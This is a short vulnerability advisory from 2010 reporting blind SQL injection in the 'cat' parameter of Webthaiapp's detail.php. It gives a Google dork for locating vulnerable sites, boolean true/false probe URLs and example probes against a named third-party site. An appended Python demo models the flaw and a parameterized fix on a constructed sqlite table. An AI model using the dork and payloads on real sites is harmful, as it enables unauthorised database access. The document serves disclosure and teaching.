Webthaiapp suffers from a remote blind SQL injection vulnerability.
--==+==================================================+==--
--==+ Webthaiapp detail.php(cat) Blind SQL Injection Vulnerability +==--
--==+==================================================+==--
Date : 30-04-2010
-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
AUTHOR: Xelenonz
Homepage : www.thaishadow.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
Application : Webthaiapp
Vendor : http://www.Webthaiapp.com/
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
DORK (google): "inurl:catalog/product/detail.php?cat="
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
DESCRIPTION:
EXPLOITS:
detail.php?cat=[valid catid]+and+1=1 << TRUE
detail.php?cat=[valid catid]+and+1=2 << False
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Example
http://www.lamthai.com/catalog/product/detail.php?cat=44+and+1=1 << True
http://www.lamthai.com/catalog/product/detail.php?cat=44+and+1=2 << False
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Special Thx : Krit admin@thaishadow,Thaishadow.com
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
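The TRUE/False difference listed under EXPLOITS, modelled as an added example that is not part of the original advisory and is not Webthaiapp's code. It assumes detail.php concatenates `cat` into its SQL text, uses Python's sqlite3 with a constructed `product` table (all names are assumptions), and sets that pattern beside a lookup that accepts only a decimal integer and binds it as a parameter.

```python
import re
import sqlite3
from urllib.parse import parse_qs

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, cat INTEGER, name TEXT)")
    db.executemany("INSERT INTO product (cat, name) VALUES (?, ?)",
                   [(44, "sample A"), (44, "sample B"), (7, "sample C")])
    return db

def cat_from_query(query):
    # URL-decode the query string the way the web server would ('+' becomes a space).
    return parse_qs(query)["cat"][0]

def detail_concat(db, cat):
    # Assumed vulnerable pattern: the request value becomes part of the SQL text,
    # so a trailing boolean condition decides whether any row is returned.
    sql = "SELECT name FROM product WHERE cat = " + cat + " ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def detail_param(db, cat):
    # Hardened lookup: allow only a short decimal integer, then bind it.
    if not re.fullmatch(r"[0-9]{1,9}", cat):
        raise ValueError("cat must be a decimal integer")
    sql = "SELECT name FROM product WHERE cat = ? ORDER BY id"
    return [row[0] for row in db.execute(sql, (int(cat),))]

def responses(db, lookup, queries):
    # Map each query string to what the page would render, or to "rejected".
    out = {}
    for q in queries:
        try:
            out[q] = lookup(db, cat_from_query(q))
        except ValueError:
            out[q] = "rejected"
    return out

if __name__ == "__main__":
    db = make_db()
    probes = ["cat=44", "cat=44+and+1=1", "cat=44+and+1=2"]
    print(responses(db, detail_concat, probes))
    print(responses(db, detail_param, probes))
```

With the hardened lookup both appended conditions get the same response, so the page no longer answers true/false questions about the database.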